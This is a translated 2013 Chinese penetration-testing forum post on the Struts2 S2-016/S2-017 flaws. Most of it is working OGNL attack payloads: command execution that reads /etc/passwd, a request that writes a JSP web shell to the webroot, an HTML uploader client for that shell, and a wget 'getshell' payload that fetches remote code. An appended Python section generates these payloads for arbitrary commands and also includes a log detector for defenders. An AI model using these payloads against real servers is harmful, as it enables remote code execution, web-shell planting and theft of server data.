中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Struts2 S2-016/S2-017 vulnerability code execution

Author: admin    Time: 2013-7-18 23:03
Everyone has already posted these; I just tidied them up. Friendly reminder: your own life is worth more than a shell...

If you like it, click thanks ^_^

Command execution with echo:
8 s2 U3 M. M  A: Y7 s4 I
http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
Path disclosure:

http://www.example.com/struts2-b ... 8%29.close%28%29%7D
Write a file:

http://www.example.com/struts2-blank/example/X.action?redirect:${
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
Contents of the written file:

<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      

It is really just a small JSP shell; it needs a client side to go with it.

Parameter f is the filename, t is the content.

Client:

<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
<textarea name=t cols=120 rows=10 width=45>your code</textarea>
<center>
<input type=submit value="Submit">
</center>
</form>

This creates fjp.jsp in the current directory.

shell:http://www.example.com/struts2-blank/example/fjp.jsp

There is also a client from @园长:

<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>jsp-园长</title>
<style>
.main{width:980px;height:600px;margin:0 auto;}
.url{width:300px;}
.fn{width:60px;}
.content{width:80%;height:60%;}
</style>
<script>
  // Point the hidden form at the dropper JSP, then post f (filename) and t (content).
  function upload(){
    var url = document.getElementById('url').value,
      content = document.getElementById('content').value,
      fileName = document.getElementById('fn').value,
      form = document.getElementById('fm');
    if(url.length == 0){
      alert("Url not allowed empty!");
      return ;
    }
    if(content.length == 0){
      alert("Content not allowed empty!");
      return ;
    }
    if(fileName.length == 0){
      alert("FileName not allowed empty!");
      return ;
    }
    form.action = url;
    form.submit();
  }
</script>
</head>
<body>
<div class="main">
  <form id="fm" method="post">
    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>
    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />
    <a href="javascript:upload();">Upload</a>
    <textarea id="content" class="content" name="t" ></textarea>
  </form>
</div>
</body>
</html>

And a wget getshell posted by @X:

?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','-O','/root/1.jsp'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23piaoye%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println(%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
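Added example, written for this page and not code from the post or from anyone quoted in it: a Python script that builds the two `redirect:` payloads above (command execution with echo, and the css3.jsp dropper) for arbitrary arguments, plus a detector that finds such requests in access logs. The root cause of S2-016 is that DefaultActionMapper in Struts 2.0.0 through 2.3.15 evaluates the *name* of any request parameter carrying a `redirect:`/`redirectAction:` prefix as OGNL, so the detector inspects parameter names, not values. The action URL, the parameter name `c`, and the log lines are constructed for the example.

```python
"""Added example, not code from the original post: build the S2-016
"redirect:" OGNL payloads shown above for any argv / file, and a small
detector that finds such requests in access logs.  URLs, parameter names
and log lines below are constructed for the example."""
import re
from urllib.parse import parse_qsl, quote, urlsplit

# DefaultActionMapper (Struts 2.0.0 - 2.3.15) evaluates the *name* of any
# parameter prefixed redirect:/redirectAction: as OGNL; ${...} forces eager
# evaluation.  '#' and '=' must be percent-encoded so the container does not
# split the parameter before Struts sees it.
RESP = "com.opensymphony.xwork2.dispatcher.HttpServletResponse"
REQ = "com.opensymphony.xwork2.dispatcher.HttpServletRequest"
SAFE = "()[]{},.'/$"  # characters left raw, as in the post's URLs


def ognl_string_array(argv):
    """argv as a Java String[] literal; single quotes inside args are escaped."""
    return "new java.lang.String[]{" + ",".join(
        "'" + a.replace("'", "\\'") + "'" for a in argv) + "}"


def exec_expression(argv, buf=50000):
    """Run argv via ProcessBuilder and echo up to buf chars of stdout into
    the HTTP response (a single read(), so long output is truncated)."""
    return "".join([
        "${#a=(new java.lang.ProcessBuilder(", ognl_string_array(argv), ")).start(),",
        "#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),",
        "#d=new java.io.BufferedReader(#c),#e=new char[", str(buf), "],#d.read(#e),",
        "#m=#context.get('", RESP, "'),",
        "#m.getWriter().println(#e),#m.getWriter().flush(),#m.getWriter().close()}",
    ])


def write_expression(filename, param="c"):
    """Write request parameter `param` to <webroot>/filename (the post's
    css3.jsp dropper); backslashes are normalised for Windows hosts."""
    return "".join([
        "${#req=#context.get('", REQ, "'),",
        '#p=(#req.getRealPath("/")+"', filename, r'").replaceAll("\\\\","/"),',
        "new java.io.BufferedWriter(new java.io.FileWriter(#p))",
        '.append(#req.getParameter("', param, '")).close()}',
    ])


def exec_url(action_url, argv):
    return action_url + "?redirect:" + quote(exec_expression(argv), safe=SAFE)


def write_url(action_url, filename, content, param="c"):
    return (action_url + "?redirect:" + quote(write_expression(filename, param), safe=SAFE)
            + "&" + param + "=" + quote(content, safe=""))


PREFIXED = re.compile(r"^(redirect|redirectAction|action):(.*)$", re.S)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def s2016_indicators(request_target):
    """Return (prefix, decoded_expr, tags) for every parameter *name* in the
    query that carries an action-mapper prefix.  Values are ignored on
    purpose: the mapper only looks at names."""
    out = []
    for name, _value in parse_qsl(urlsplit(request_target).query, keep_blank_values=True):
        m = PREFIXED.match(name)
        if not m:
            continue
        expr, tags = m.group(2), set()
        if "${" in expr or "%{" in expr:
            tags.add("ognl")
        if "ProcessBuilder" in expr or "Runtime" in expr:
            tags.add("process_spawn")
        if any(k in expr for k in ("FileWriter", "FileOutputStream")):
            tags.add("file_write")
        if "HttpServletResponse" in expr:
            tags.add("response_echo")
        out.append((m.group(1), expr, tags))
    return out


def scan_log(lines):
    """(client, prefix, sorted tags) for each hit in Common Log Format lines."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if m:
            for prefix, _expr, tags in s2016_indicators(m.group(1)):
                hits.append((line.split()[0], prefix, sorted(tags)))
    return hits


SAMPLE_LOG = [  # constructed lines
    '10.0.0.5 - - [18/Jul/2013:23:03:11 +0800] "GET /struts2-blank/example/X.action'
    '?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%27id%27}))'
    '.start(),%23m%3d%23context.get(%27' + RESP + '%27)} HTTP/1.1" 200 512',
    '10.0.0.6 - - [18/Jul/2013:23:04:02 +0800] "GET /struts2-blank/example/HelloWorld.action'
    '?redirect:http://evil.example/ HTTP/1.1" 302 0',  # S2-017 style open redirect, no OGNL
    '10.0.0.7 - - [18/Jul/2013:23:05:40 +0800] "GET /struts2-blank/example/X.action'
    '?name=redirect:${1%2b1} HTTP/1.1" 200 100',  # prefix in a value: never evaluated
]

if __name__ == "__main__":
    print(exec_url("http://www.example.com/struts2-blank/example/X.action", ["cat", "/etc/passwd"]))
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Run against the constructed log the scanner reports the first line as ognl + process_spawn + response_echo, the second as a bare `redirect:` prefix (the S2-017 open-redirect shape, no expression), and stays silent on the third because the prefix sits in a value. Both issues were fixed in Struts 2.3.15.1; the builder is for confirming your own hosts are patched and the detector for writing a WAF or log rule, not a substitute for upgrading.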
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2